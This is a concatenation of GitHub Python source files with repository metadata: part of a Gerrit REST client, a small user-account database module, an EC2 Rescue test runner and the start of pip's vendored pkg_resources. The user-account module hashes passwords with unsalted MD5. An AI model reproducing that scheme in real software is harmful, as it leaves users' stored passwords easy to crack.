"""Perform consistency checks on the change."""
request_path = "{api_path}{change_id}/check".format(
api_path=self.api_path,
change_id=requests_utils.quote(change_id, safe=''))
return self.connection.get_request(request_path)
def fix_consistency(self, change_id, is_delete=False,
expect_merged_as=False):
"""Perform consistency checks on the change and fixes any problems.
:param change_id: Identifier that uniquely identifies one change.
:param is_delete: If True, delete patch sets from the database
if they refer to missing commit options.
:param expect_merged_as: If True, check that the change is merged into
the destination branch as this exact SHA-1.
If not, insert a new patch set referring to
this commit.
:return Returns a ChangeInfo entity with the problems field values
that reflect any fixes.
"""
data = {'delete_patch_set_if_commit_missing': is_delete,
'expect_merged_as': expect_merged_as}
request_path = "{api_path}{change_id}/check".format(
api_path=self.api_path,
change_id=requests_utils.quote(change_id, safe=''))
return self.connection.post_request(request_path, json_data=data)
def get_client(connection):
return ChangeClient(connection)
| {
"content_hash": "86ed119b3bb3091caac8908c6dcefe2a",
"timestamp": "",
"source": "github",
"line_count": 247,
"max_line_length": 79,
"avg_line_length": 42.26315789473684,
"alnum_prop": 0.5983331736756394,
"repo_name": "tivaliy/python-gerritclient",
"id": "32d2ea6f84fe4fcdcadf7582cfa2326f6e9d4e40",
"size": "11052",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "gerritclient/v1/change.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "306577"
}
],
"symlink_target": ""
} |
import time
import hashlib
import globaldb
class User(object):
def __init__(self):
self.db = globaldb.db
# password encoding
def encode_pwd(self, str):
if str is not None:
m = hashlib.md5()
m.update(str)
return m.hexdigest()
else:
return ""
def insert_user(self, email, password):
password = self.encode_pwd(password)
sqlstr = """
INSERT INTO `yagra`.`yagra_user`
(
`user_login`,
`user_passwd`,
`user_email`,
`user_time`
)
VALUES
(%s, %s, %s, %s)
"""
c = self.db.cursor()
try:
c.execute(sqlstr, (email, password, email,
time.strftime('%Y-%m-%d %H:%M:%S')))
self.db.commit()
lastinsertid = c.lastrowid
return lastinsertid
except:
self.db.rollback()
return -1
def get_user(self, name):
sqlstr = "SELECT * FROM yagra_user WHERE user_email = %s"
c = self.db.cursor()
c.execute(sqlstr, (name))
result = c.fetchall()
if len(result) is not 0:
return 0
else:
return -1
def get_user_all(self, name):
sqlstr = "SELECT * FROM yagra_user WHERE user_email = %s"
c = self.db.cursor()
c.execute(sqlstr, (name))
result = c.fetchall()
if len(result) is not 0:
return result[0]
else:
return None
def check_user(self, name, password):
password = self.encode_pwd(password)
sqlstr = "SELECT * FROM yagra_user WHERE user_email = %s AND user_passwd = %s"
c = self.db.cursor()
c.execute(sqlstr, (name, password))
result = c.fetchall()
if len(result) is not 0:
return 0
else:
return -1
def update_password(self, name, password):
password = self.encode_pwd(password)
sqlstr = "UPDATE yagra_user SET user_passwd = %s WHERE user_email = %s"
c = self.db.cursor()
try:
result = c.execute(sqlstr, (password, name))
self.db.commit()
if result > 0:
return 0
else:
return -1
except:
self.db.rollback()
return -1
| {
"content_hash": "ad6d33b4732d0b1ee24d2db447d255a8",
"timestamp": "",
"source": "github",
"line_count": 91,
"max_line_length": 86,
"avg_line_length": 26.604395604395606,
"alnum_prop": 0.4836844279223461,
"repo_name": "vincentpc/yagra",
"id": "4c5e49795fdc60dff57b4b3a3fa98135d09e7c20",
"size": "2459",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "model/dbapi.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "18845"
},
{
"name": "JavaScript",
"bytes": "56320"
},
{
"name": "Python",
"bytes": "31276"
},
{
"name": "Shell",
"bytes": "6699"
}
],
"symlink_target": ""
} |
"""
Run unit tests for modules.
"""
from __future__ import print_function
import os
import sys
import unittest
import coverage
def main():
# Add the root program directory and the module tests directory to sys.path
call_paths = list()
split_call_path_list = os.path.abspath(sys.argv[0]).split(os.sep)
split_call_path_list[0] = "/"
this_files_name = os.path.split(__file__)[-1]
for file_name in [this_files_name, "tools"]:
if split_call_path_list[-1] == file_name and file_name == "tools":
call_paths.append(os.path.join(*split_call_path_list))
split_call_path_list = split_call_path_list[0:-1]
elif split_call_path_list[-1] == file_name:
split_call_path_list = split_call_path_list[0:-1]
else:
print("Error parsing call path {} on token {}. Aborting.".format(os.path.join(*split_call_path_list),
file_name))
sys.exit(1)
call_paths.append(os.path.join(*split_call_path_list))
call_paths.append(os.path.join(call_paths[-1], "lib"))
for call_path in call_paths:
sys.path.insert(0, call_path)
try:
print("Running tests...")
code_coverage = coverage.Coverage(branch=True, source=["moduletests/src/"])
code_coverage.start()
tests = unittest.TestLoader().discover(os.path.join(os.getcwd(), "moduletests", "unit"))
results = unittest.runner.TextTestRunner().run(tests)
if not results.wasSuccessful():
sys.exit(1)
code_coverage.stop()
code_coverage.save()
code_coverage.report(show_missing=True)
except Exception:
print("Caught unhandled exception!")
raise
if __name__ == "__main__":
main()
| {
"content_hash": "0ebac0521ee2ae09f08017747ccb86a4",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 113,
"avg_line_length": 36.1,
"alnum_prop": 0.5933518005540166,
"repo_name": "Drudenhaus/aws-ec2rescue-linux",
"id": "e210393dc770b34f3b6c56be1b8a321404c6b275",
"size": "2378",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "tools/run_module_unit_tests.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "701"
},
{
"name": "Makefile",
"bytes": "4878"
},
{
"name": "Python",
"bytes": "4761897"
},
{
"name": "Shell",
"bytes": "5229"
}
],
"symlink_target": ""
} |
"""
Package resource API
--------------------
A resource is a logical file contained within a package, or a logical
subdirectory thereof. The package resource API expects resource names
to have their path parts separated with ``/``, *not* whatever the local
path separator is. Do not use os.path operations to manipulate resource
names being passed into the API.
The package resource API is designed to work with normal filesystem packages,
.egg files, and unpacked .egg files. It can also work in a limited way with
.zip files and with custom PEP 302 loaders that support the ``get_data()``
method.
"""
from __future__ import absolute_import
import sys
import os
import io
import time
import re
import types
import zipfile
import zipimport
import warnings
import stat
import functools
import pkgutil
import operator
import platform
import collections
import plistlib
import email.parser
import tempfile
import textwrap
from pkgutil import get_importer
try:
import _imp
except ImportError:
# Python 3.2 compatibility
import imp as _imp
from pip._vendor import six
from pip._vendor.six.moves import urllib, map, filter
# capture these to bypass sandboxing
from os import utime
try:
from os import mkdir, rename, unlink
WRITE_SUPPORT = True
except ImportError:
# no write support, probably under GAE
WRITE_SUPPORT = False
from os import open as os_open
from os.path import isdir, split
try:
import importlib.machinery as importlib_machinery
# access attribute to force import under delayed import mechanisms.
importlib_machinery.__name__
except ImportError:
importlib_machinery = None
from pip._vendor import appdirs
from pip._vendor import packaging
__import__('pip._vendor.packaging.version')
__import__('pip._vendor.packaging.specifiers')
__import__('pip._vendor.packaging.requirements')
__import__('pip._vendor.packaging.markers')
if (3, 0) < sys.version_info < (3, 3):
msg = (
"Support for Python 3.0-3.2 has been dropped. Future versions "
"will fail here."
)
warnings.warn(msg)
# declare some globals that will be defined later to
# satisfy the linters.
require = None
working_set = None
class PEP440Warning(RuntimeWarning):
"""
Used when there is an issue with a version or specifier not complying with
PEP 440.
"""
class _SetuptoolsVersionMixin(object):
def __hash__(self):
return super(_SetuptoolsVersionMixin, self).__hash__()
def __lt__(self, other):
if isinstance(other, tuple):
return tuple(self) < other
else:
return super(_SetuptoolsVersionMixin, self).__lt__(other)
def __le__(self, other):
if isinstance(other, tuple):
return tuple(self) <= other
else:
return super(_SetuptoolsVersionMixin, self).__le__(other)
def __eq__(self, other):
if isinstance(other, tuple):
return tuple(self) == other
else:
return super(_SetuptoolsVersionMixin, self).__eq__(other)
def __ge__(self, other):
if isinstance(other, tuple):
return tuple(self) >= other
else:
return super(_SetuptoolsVersionMixin, self).__ge__(other)
def __gt__(self, other):
if isinstance(other, tuple):
return tuple(self) > other
else:
return super(_SetuptoolsVersionMixin, self).__gt__(other)
def __ne__(self, other):
if isinstance(other, tuple):
return tuple(self) != other
else:
return super(_SetuptoolsVersionMixin, self).__ne__(other)
def __getitem__(self, key):
return tuple(self)[key]
def __iter__(self):
component_re = re.compile(r'(\d+ | [a-z]+ | \.| -)', re.VERBOSE)
replace = {
'pre': 'c',
'preview': 'c',
'-': 'final-',
'rc': 'c',
'dev': '@',
}.get
def _parse_version_parts(s):
for part in component_re.split(s):
part = replace(part, part)
if not part or part == '.':
continue
if part[:1] in '0123456789':
# pad for numeric comparison
yield part.zfill(8)
else:
yield '*' + part
# ensure that alpha/beta/candidate are before final
yield '*final'
def old_parse_version(s):
parts = []
for part in _parse_version_parts(s.lower()):
if part.startswith('*'):
# remove '-' before a prerelease tag
if part < '*final':
while parts and parts[-1] == '*final-':
parts.pop()
# remove trailing zeros from each series of numeric parts
while parts and parts[-1] == '00000000':
parts.pop()
parts.append(part)
return tuple(parts)
# Warn for use of this function
warnings.warn(
"You have iterated over the result of "
"pkg_resources.parse_version. This is a legacy behavior which is "
"inconsistent with the new version class introduced in setuptools "
"8.0. In most cases, conversion to a tuple is unnecessary. For "
"comparison of versions, sort the Version instances directly. If "
"you have another use case requiring the tuple, please file a "
"bug with the setuptools project describing that need.",
RuntimeWarning,
stacklevel=1,
)
for part in old_parse_version(str(self)):
yield part
class SetuptoolsVersion(_SetuptoolsVersionMixin, packaging.version.Version):
pass
class SetuptoolsLegacyVersion(_SetuptoolsVersionMixin,
packaging.version.LegacyVersion):
pass
def parse_version(v):
try:
return SetuptoolsVersion(v)
except packaging.version.InvalidVersion:
return SetuptoolsLegacyVersion(v)
_state_vars = {}
def _declare_state(vartype, **kw):
globals().update(kw)
_state_vars.update(dict.fromkeys(kw, vartype))
def __getstate__():
state = {}
g = globals()
for k, v in _state_vars.items():
state[k] = g['_sget_' + v](g[k])
return state
def __setstate__(state):
g = globals()
for k, v in state.items():
g['_sset_' + _state_vars[k]](k, g[k], v)
return state
def _sget_dict(val):
return val.copy()
def _sset_dict(key, ob, state):
ob.clear()
ob.update(state)
def _sget_object(val):
return val.__getstate__()
def _sset_object(key, ob, state):
ob.__setstate__(state)
_sget_none = _sset_none = lambda *args: None
def get_supported_platform():
"""Return this platform's maximum compatible version.
distutils.util.get_platform() normally reports the minimum version
of Mac OS X that would be required to *use* extensions produced by
distutils. But what we want when checking compatibility is to know the
version of Mac OS X that we are *running*. To allow usage of packages that
explicitly require a newer version of Mac OS X, we must also know the
current version of the OS.
If this condition occurs for any other platform with a version in its
platform strings, this function should be extended accordingly.
"""
plat = get_build_platform()
m = macosVersionString.match(plat)
if m is not None and sys.platform == "darwin":
try:
plat = 'macosx-%s-%s' % ('.'.join(_macosx_vers()[:2]), m.group(3))
except ValueError:
# not Mac OS X
pass
return plat
__all__ = [
# Basic resource access and distribution/entry point discovery
'require', 'run_script', 'get_provider', 'get_distribution',
'load_entry_point', 'get_entry_map', 'get_entry_info',
'iter_entry_points',
'resource_string', 'resource_stream', 'resource_filename',
'resource_listdir', 'resource_exists', 'resource_isdir',
# Environmental control
'declare_namespace', 'working_set', 'add_activation_listener',
'find_distributions', 'set_extraction_path', 'cleanup_resources',
'get_default_cache',
# Primary implementation classes
'Environment', 'WorkingSet', 'ResourceManager',
'Distribution', 'Requirement', 'EntryPoint',
# Exceptions
'ResolutionError', 'VersionConflict', 'DistributionNotFound',
'UnknownExtra', 'ExtractionError',
# Warnings
'PEP440Warning',
# Parsing functions and string utilities
'parse_requirements', 'parse_version', 'safe_name', 'safe_version',
'get_platform', 'compatible_platforms', 'yield_lines', 'split_sections',
'safe_extra', 'to_filename', 'invalid_marker', 'evaluate_marker',
# filesystem utilities
'ensure_directory', 'normalize_path',
# Distribution "precedence" constants
'EGG_DIST', 'BINARY_DIST', 'SOURCE_DIST', 'CHECKOUT_DIST', 'DEVELOP_DIST',
# "Provider" interfaces, implementations, and registration/lookup APIs
'IMetadataProvider', 'IResourceProvider', 'FileMetadata',
'PathMetadata', 'EggMetadata', 'EmptyProvider', 'empty_provider',
'NullProvider', 'EggProvider', 'DefaultProvider', 'ZipProvider',
'register_finder', 'register_namespace_handler', 'register_loader_type',
'fixup_namespace_packages', 'get_importer',
# Deprecated/backward compatibility only
'run_main', 'AvailableDistributions',
]
class ResolutionError(Exception):
"""Abstract base for dependency resolution errors"""
def __repr__(self):
return self.__class__.__name__ + repr(self.args)
class VersionConflict(ResolutionError):
"""
An already-installed version conflicts with the requested version.
Should be initialized with the installed Distribution and the requested
Requirement.
"""
_template = "{self.dist} is installed but {self.req} is required"
@property
def dist(self):
return self.args[0]
@property
def req(self):
return self.args[1]
def report(self):
return self._template.format(**locals())
def with_context(self, required_by):
"""
If required_by is non-empty, return a version of self that is a
ContextualVersionConflict.
"""
if not required_by:
return self
args = self.args + (required_by,)
return ContextualVersionConflict(*args)
class ContextualVersionConflict(VersionConflict):
"""
A VersionConflict that accepts a third parameter, the set of the
requirements that required the installed Distribution.
"""
_template = VersionConflict._template + ' by {self.required_by}'
@property
def required_by(self):
return self.args[2]
class DistributionNotFound(ResolutionError):
"""A requested distribution was not found"""
_template = ("The '{self.req}' distribution was not found "
"and is required by {self.requirers_str}")
@property
def req(self):
return self.args[0]
@property
def requirers(self):
return self.args[1]
@property
def requirers_str(self):
if not self.requirers:
return 'the application'
return ', '.join(self.requirers)
def report(self):
return self._template.format(**locals())
def __str__(self):
return self.report()
class UnknownExtra(ResolutionError):
"""Distribution doesn't have an "extra feature" of the given name"""
_provider_factories = {}
PY_MAJOR = sys.version[:3]
EGG_DIST = 3
BINARY_DIST = 2
SOURCE_DIST = 1
CHECKOUT_DIST = 0
DEVELOP_DIST = -1
def register_loader_type(loader_type, provider_factory):
"""Register `provider_factory` to make providers for `loader_type`
`loader_type` is the type or class of a PEP 302 ``module.__loader__``,
and `provider_factory` is a function that, passed a *module* object,
returns an ``IResourceProvider`` for that module.
"""
_provider_factories[loader_type] = provider_factory
def get_provider(moduleOrReq):
"""Return an IResourceProvider for the named module or requirement"""
if isinstance(moduleOrReq, Requirement):
return working_set.find(moduleOrReq) or require(str(moduleOrReq))[0]
try:
module = sys.modules[moduleOrReq]
except KeyError:
__import__(moduleOrReq)
module = sys.modules[moduleOrReq]
loader = getattr(module, '__loader__', None)
return _find_adapter(_provider_factories, loader)(module)
def _macosx_vers(_cache=[]):
if not _cache:
version = platform.mac_ver()[0]
# fallback for MacPorts
if version == '':
plist = '/System/Library/CoreServices/SystemVersion.plist'
if os.path.exists(plist):
if hasattr(plistlib, 'readPlist'):
plist_content = plistlib.readPlist(plist)
if 'ProductVersion' in plist_content:
version = plist_content['ProductVersion']
_cache.append(version.split('.'))
return _cache[0]
def _macosx_arch(machine):
return {'PowerPC': 'ppc', 'Power_Macintosh': 'ppc'}.get(machine, machine)
def get_build_platform():
"""Return this platform's string for platform-specific distributions
XXX Currently this is the same as ``distutils.util.get_platform()``, but it
needs some hacks for Linux and Mac OS X.
"""
try:
# Python 2.7 or >=3.2
from sysconfig import get_platform
except ImportError:
from distutils.util import get_platform
plat = get_platform()
if sys.platform == "darwin" and not plat.startswith('macosx-'):
try:
version = _macosx_vers()
machine = os.uname()[4].replace(" ", "_")
return "macosx-%d.%d-%s" % (int(version[0]), int(version[1]),
_macosx_arch(machine))
except ValueError:
# if someone is running a non-Mac darwin system, this will fall
# through to the default implementation
pass
return plat
macosVersionString = re.compile(r"macosx-(\d+)\.(\d+)-(.*)")
darwinVersionString = re.compile(r"darwin-(\d+)\.(\d+)\.(\d+)-(.*)")
# XXX backward compat
get_platform = get_build_platform
def compatible_platforms(provided, required):
"""Can code for the `provided` platform run on the `required` platform?
Returns true if either platform is ``None``, or the platforms are equal.
XXX Needs compatibility checks for Linux and other unixy OSes.
"""
if provided is None or required is None or provided == required:
# easy case
return True
# Mac OS X special cases
reqMac = macosVersionString.match(required)
if reqMac:
provMac = macosVersionString.match(provided)
# is this a Mac package?
if not provMac:
# this is backwards compatibility for packages built before
# setuptools 0.6. All packages built after this point will
# use the new macosx designation.
provDarwin = darwinVersionString.match(provided)
if provDarwin:
dversion = int(provDarwin.group(1))
macosversion = "%s.%s" % (reqMac.group(1), reqMac.group(2))
if dversion == 7 and macosversion >= "10.3" or \
dversion == 8 and macosversion >= "10.4":
return True
# egg isn't macosx or legacy darwin
return False
# are they the same major version and machine type?
if provMac.group(1) != reqMac.group(1) or \
provMac.group(3) != reqMac.group(3):
return False
# is the required OS major update >= the provided one?
if int(provMac.group(2)) > int(reqMac.group(2)):
return False
return True
# XXX Linux and other platforms' special cases should go here
return False
def run_script(dist_spec, script_name):
"""Locate distribution `dist_spec` and run its `script_name` script"""
ns = sys._getframe(1).f_globals
name = ns['__name__']
ns.clear()
ns['__name__'] = name
require(dist_spec)[0].run_script(script_name, ns)
# backward compatibility
run_main = run_script
def get_distribution(dist):
"""Return a current distribution object for a Requirement or string"""
if isinstance(dist, six.string_types):
dist = Requirement.parse(dist)
if isinstance(dist, Requirement):
dist = get_provider(dist)
if not isinstance(dist, Distribution):
raise TypeError("Expected string, Requirement, or Distribution", dist)
return dist
def load_entry_point(dist, group, name):
"""Return `name` entry point of `group` for `dist` or raise ImportError"""
return get_distribution(dist).load_entry_point(group, name)
def get_entry_map(dist, group=None):
"""Return the entry point map for `group`, or the full entry map"""
return get_distribution(dist).get_entry_map(group)
def get_entry_info(dist, group, name):
"""Return the EntryPoint object for `group`+`name`, or ``None``"""
return get_distribution(dist).get_entry_info(group, name)
class IMetadataProvider:
def has_metadata(name):
"""Does the package's distribution contain the named metadata?"""
def get_metadata(name):
"""The named metadata resource as a string"""
def get_metadata_lines(name):
"""Yield named metadata resource as list of non-blank non-comment lines
Leading and trailing whitespace is stripped from each line, and lines
with ``#`` as the first non-blank character are omitted."""
def metadata_isdir(name):
"""Is the named metadata a directory? (like ``os.path.isdir()``)"""
def metadata_listdir(name):
"""List of metadata names in the directory (like ``os.listdir()``)"""
def run_script(script_name, namespace):
"""Execute the named script in the supplied namespace dictionary"""
class IResourceProvider(IMetadataProvider):
"""An object that provides access to package resources"""
def get_resource_filename(manager, resource_name):
"""Return a true filesystem path for `resource_name`
`manager` must be an ``IResourceManager``"""
def get_resource_stream(manager, resource_name):
"""Return a readable file-like object for `resource_name`
`manager` must be an ``IResourceManager``"""
def get_resource_string(manager, resource_name):
"""Return a string containing the contents of `resource_name`
`manager` must be an ``IResourceManager``"""
def has_resource(resource_name):
"""Does the package contain the named resource?"""
def resource_isdir(resource_name):
"""Is the named resource a directory? (like ``os.path.isdir()``)"""
def resource_listdir(resource_name):
"""List of resource names in the directory (like ``os.listdir()``)"""
class WorkingSet(object):
"""A collection of active distributions on sys.path (or a similar list)"""
def __init__(self, entries=None):
"""Create working set from list of path entries (default=sys.path)"""
self.entries = []
self.entry_keys = {}
self.by_key = {}
self.callbacks = []
if entries is None:
entries = sys.path
for entry in entries:
self.add_entry(entry)
@classmethod
def _build_master(cls):
"""
Prepare the master working set.
"""
ws = cls()
try:
from __main__ import __requires__
except ImportError:
# The main program does not list any requirements
return ws
# ensure the requirements are met
try:
ws.require(__requires__)
except VersionConflict:
return cls._build_from_requirements(__requires__)
return ws
@classmethod
def _build_from_requirements(cls, req_spec):
"""
Build a working set from a requirement spec. Rewrites sys.path.
"""
# try it without defaults already on sys.path
# by starting with an empty path
ws = cls([])
reqs = parse_requirements(req_spec)
dists = ws.resolve(reqs, Environment())
for dist in dists:
ws.add(dist)
# add any missing entries from sys.path
for entry in sys.path:
if entry not in ws.entries:
ws.add_entry(entry)
# then copy back to sys.path
sys.path[:] = ws.entries
return ws
def add_entry(self, entry):
"""Add a path item to ``.entries``, finding any distributions on it
``find_distributions(entry, True)`` is used to find distributions
corresponding to the path entry, and they are added. `entry` is
always appended to ``.entries``, even if it is already present.
(This is because ``sys.path`` can contain the same value more than
once, and the ``.entries`` of the ``sys.path`` WorkingSet should always
equal ``sys.path``.)
"""
self.entry_keys.setdefault(entry, [])
self.entries.append(entry)
for dist in find_distributions(entry, True):
self.add(dist, entry, False)
def __contains__(self, dist):
"""True if `dist` is the active distribution for its project"""
return self.by_key.get(dist.key) == dist
def find(self, req):
"""Find a distribution matching requirement `req`
If there is an active distribution for the requested project, this
returns it as long as it meets the version requirement specified by
`req`. But, if there is an active distribution for the project and it
does *not* meet the `req` requirement, ``VersionConflict`` is raised.
If there is no active distribution for the requested project, ``None``
is returned.
"""
dist = self.by_key.get(req.key)
if dist is not None and dist not in req:
# XXX add more info
raise VersionConflict(dist, req)
return dist
def iter_entry_points(self, group, name=None):
"""Yield entry point objects from `group` matching `name`
If `name` is None, yields all entry points in `group` from all
distributions in the working set, otherwise only ones matching
both `group` and `name` are yielded (in distribution order).
"""
for dist in self:
entries = dist.get_entry_map(group)
if name is None:
for ep in entries.values():
yield ep
elif name in entries:
yield entries[name]
def run_script(self, requires, script_name):
"""Locate distribution for `requires` and run `script_name` script"""
ns = sys._getframe(1).f_globals
name = ns['__name__']
ns.clear()
ns['__name__'] = name
self.require(requires)[0].run_script(script_name, ns)
def __iter__(self):
"""Yield distributions for non-duplicate projects in the working set
The yield order is the order in which the items' path entries were
added to the working set.
"""
seen = {}
for item in self.entries:
if item not in self.entry_keys:
# workaround a cache issue
continue
for key in self.entry_keys[item]:
if key not in seen:
seen[key] = 1
yield self.by_key[key]
def add(self, dist, entry=None, insert=True, replace=False):
"""Add `dist` to working set, associated with `entry`
If `entry` is unspecified, it defaults to the ``.location`` of `dist`.
On exit from this routine, `entry` is added to the end of the working
set's ``.entries`` (if it wasn't already present).
`dist` is only added to the working set if it's for a project that
doesn't already have a distribution in the set, unless `replace=True`.
If it's added, any callbacks registered with the ``subscribe()`` method
will be called.
"""
if insert:
dist.insert_on(self.entries, entry, replace=replace)
if entry is None:
entry = dist.location
keys = self.entry_keys.setdefault(entry, [])
keys2 = self.entry_keys.setdefault(dist.location, [])
if not replace and dist.key in self.by_key:
# ignore hidden distros
return
self.by_key[dist.key] = dist
if dist.key not in keys:
keys.append(dist.key)
if dist.key not in keys2:
keys2.append(dist.key)
self._added_new(dist)
def resolve(self, requirements, env=None, installer=None,
replace_conflicting=False):
"""List all distributions needed to (recursively) meet `requirements`
`requirements` must be a sequence of ``Requirement`` objects. `env`,
if supplied, should be an ``Environment`` instance. If
not supplied, it defaults to all distributions available within any
entry or distribution in the working set. `installer`, if supplied,
will be invoked with each requirement that cannot be met by an
already-installed distribution; it should return a ``Distribution`` or
``None``.
Unless `replace_conflicting=True`, raises a VersionConflict exception if
any requirements are found on the path that have the correct name but
the wrong version. Otherwise, if an `installer` is supplied it will be
invoked to obtain the correct version of the requirement and activate
it.
"""
# set up the stack
requirements = list(requirements)[::-1]
# set of processed requirements
processed = {}
# key -> dist
best = {}
to_activate = []
req_extras = _ReqExtras()
# Mapping of requirement to set of distributions that required it;
# useful for reporting info about conflicts.
required_by = collections.defaultdict(set)
while requirements:
# process dependencies breadth-first
req = requirements.pop(0)
if req in processed:
# Ignore cyclic or redundant dependencies
continue
if not req_extras.markers_pass(req):
continue
dist = best.get(req.key)
if dist is None:
# Find the best distribution and add it to the map
dist = self.by_key.get(req.key)
if dist is None or (dist not in req and replace_conflicting):
ws = self
if env is None:
if dist is None:
env = Environment(self.entries)
else:
# Use an empty environment and workingset to avoid
# any further conflicts with the conflicting
# distribution
env = Environment([])
ws = WorkingSet([])
dist = best[req.key] = env.best_match(req, ws, installer)
if dist is None:
requirers = required_by.get(req, None)
raise DistributionNotFound(req, requirers)
to_activate.append(dist)
if dist not in req:
# Oops, the "best" so far conflicts with a dependency
dependent_req = required_by[req]
raise VersionConflict(dist, req).with_context(dependent_req)
# push the new requirements onto the stack
new_requirements = dist.requires(req.extras)[::-1]
requirements.extend(new_requirements)
# Register the new requirements needed by req
for new_requirement in new_requirements:
required_by[new_requirement].add(req.project_name)
req_extras[new_requirement] = req.extras
processed[req] = True
# return list of distros to activate
return to_activate
def find_plugins(self, plugin_env, full_env=None, installer=None,
fallback=True):
"""Find all activatable distributions in `plugin_env`
Example usage::
distributions, errors = working_set.find_plugins(
Environment(plugin_dirlist)
)
# add plugins+libs to sys.path
map(working_set.add, distributions)
# display errors
print('Could not load', errors)
The `plugin_env` should be an ``Environment`` instance that contains
only distributions that are in the project's "plugin directory" or
directories. The `full_env`, if supplied, should be an ``Environment``
contains all currently-available distributions. If `full_env` is not
supplied, one is created automatically from the ``WorkingSet`` this
method is called on, which will typically mean that every directory on
``sys.path`` will be scanned for distributions.
`installer` is a standard installer callback as used by the
``resolve()`` method. The `fallback` flag indicates whether we should
attempt to resolve older versions of a plugin if the newest version
cannot be resolved.
This method returns a 2-tuple: (`distributions`, `error_info`), where
`distributions` is a list of the distributions found in `plugin_env`
that were loadable, along with any other distributions that are needed
to resolve their dependencies. `error_info` is a dictionary mapping
unloadable plugin distributions to an exception instance describing the
error that occurred. Usually this will be a ``DistributionNotFound`` or
``VersionConflict`` instance.
"""
plugin_projects = list(plugin_env)
# scan project names in alphabetic order
plugin_projects.sort()
error_info = {}
distributions = {}
if full_env is None:
env = Environment(self.entries)
env += plugin_env
else:
env = full_env + plugin_env
shadow_set = self.__class__([])
# put all our entries in shadow_set
list(map(shadow_set.add, self))
for project_name in plugin_projects:
for dist in plugin_env[project_name]:
req = [dist.as_requirement()]
try:
resolvees = shadow_set.resolve(req, env, installer)
except ResolutionError as v:
# save error info
error_info[dist] = v
if fallback:
# try the next older version of project
continue
else:
# give up on this project, keep going
break
else:
list(map(shadow_set.add, resolvees))
distributions.update(dict.fromkeys(resolvees))
# success, no need to try any more versions of this project
break
distributions = list(distributions)
distributions.sort()
return distributions, error_info
def require(self, *requirements):
"""Ensure that distributions matching `requirements` are activated
`requirements` must be a string or a (possibly-nested) sequence
thereof, specifying the distributions and versions required. The
return value is a sequence of the distributions that needed to be
activated to fulfill the requirements; all relevant distributions are
included, even if they were already activated in this working set.
"""
needed = self.resolve(parse_requirements(requirements))
for dist in needed:
self.add(dist)
return needed
def subscribe(self, callback, existing=True):
"""Invoke `callback` for all distributions
If `existing=True` (default),
call on all existing ones, as well.
"""
if callback in self.callbacks:
return
self.callbacks.append(callback)
if not existing:
return
for dist in self:
callback(dist)
def _added_new(self, dist):
for callback in self.callbacks:
callback(dist)
def __getstate__(self):
return (
self.entries[:], self.entry_keys.copy(), self.by_key.copy(),
self.callbacks[:]
)
def __setstate__(self, e_k_b_c):
entries, keys, by_key, callbacks = e_k_b_c
self.entries = entries[:]
self.entry_keys = keys.copy()
self.by_key = by_key.copy()
self.callbacks = callbacks[:]
class _ReqExtras(dict):
"""
Map each requirement to the extras that demanded it.
"""
def markers_pass(self, req):
"""
Evaluate markers for req against each extra that
demanded it.
Return False if the req has a marker and fails
evaluation. Otherwise, return True.
"""
extra_evals = (
req.marker.evaluate({'extra': extra})
for extra in self.get(req, ()) + (None,)
)
return not req.marker or any(extra_evals)
class Environment(object):
"""Searchable snapshot of distributions on a search path"""
def __init__(self, search_path=None, platform=get_supported_platform(),
python=PY_MAJOR):
"""Snapshot distributions available on a search path
Any distributions found on `search_path` are added to the environment.
`search_path` should be a sequence of ``sys.path`` items. If not
supplied, ``sys.path`` is used.
`platform` is an optional string specifying the name of the platform
that platform-specific distributions must be compatible with. If
unspecified, it defaults to the current platform. `python` is an
optional string naming the desired version of Python (e.g. ``'3.3'``);
it defaults to the current version.
You may explicitly set `platform` (and/or `python`) to ``None`` if you
wish to map *all* distributions, not just those compatible with the
running platform or Python version.
"""
self._distmap = {}
self.platform = platform
self.python = python
self.scan(search_path)
def can_add(self, dist):
"""Is distribution `dist` acceptable for this environment?
The distribution must match the platform and python version
requirements specified when this environment was created, or False
is returned.
"""
return (self.python is None or dist.py_version is None
or dist.py_version == self.python) \
and compatible_platforms(dist.platform, self.platform)
def remove(self, dist):
"""Remove `dist` from the environment"""
self._distmap[dist.key].remove(dist)
def scan(self, search_path=None):
"""Scan `search_path` for distributions usable in this environment
Any distributions found are added to the environment.
`search_path` should be a sequence of ``sys.path`` items. If not
supplied, ``sys.path`` is used. Only distributions conforming to
the platform/python version defined at initialization are added.
"""
if search_path is None:
search_path = sys.path
for item in search_path:
for dist in find_distributions(item):
self.add(dist)
def __getitem__(self, project_name):
"""Return a newest-to-oldest list of distributions for `project_name`
Uses case-insensitive `project_name` comparison, assuming all the
project's distributions use their project's name converted to all
lowercase as their key.
"""
distribution_key = project_name.lower()
return self._distmap.get(distribution_key, [])
def add(self, dist):
"""Add `dist` if we ``can_add()`` it and it has not already been added
"""
if self.can_add(dist) and dist.has_version():
dists = self._distmap.setdefault(dist.key, [])
if dist not in dists:
dists.append(dist)
dists.sort(key=operator.attrgetter('hashcmp'), reverse=True)
def best_match(self, req, working_set, installer=None):
"""Find distribution best matching `req` and usable on `working_set`
This calls the ``find(req)`` method of the `working_set` to see if a
suitable distribution is already active. (This may raise
``VersionConflict`` if an unsuitable version of the project is already
active in the specified `working_set`.) If a suitable distribution
isn't active, this method returns the newest distribution in the
environment that meets the ``Requirement`` in `req`. If no suitable
distribution is found, and `installer` is supplied, then the result of
calling the environment's ``obtain(req, installer)`` method will be
returned.
"""
dist = working_set.find(req)
if dist is not None:
return dist
for dist in self[req.key]:
if dist in req:
return dist
# try to download/install
return self.obtain(req, installer)
def obtain(self, requirement, installer=None):
"""Obtain a distribution matching `requirement` (e.g. via download)
Obtain a distro that matches requirement (e.g. via download). In the
base ``Environment`` class, this routine just returns
``installer(requirement)``, unless `installer` is None, in which case
None is returned instead. This method is a hook that allows subclasses
to attempt other ways of obtaining a distribution before falling back
to the `installer` argument."""
if installer is not None:
return installer(requirement)
def __iter__(self):
"""Yield the unique project names of the available distributions"""
for key in self._distmap.keys():
if self[key]:
yield key
def __iadd__(self, other):
"""In-place addition of a distribution or environment"""
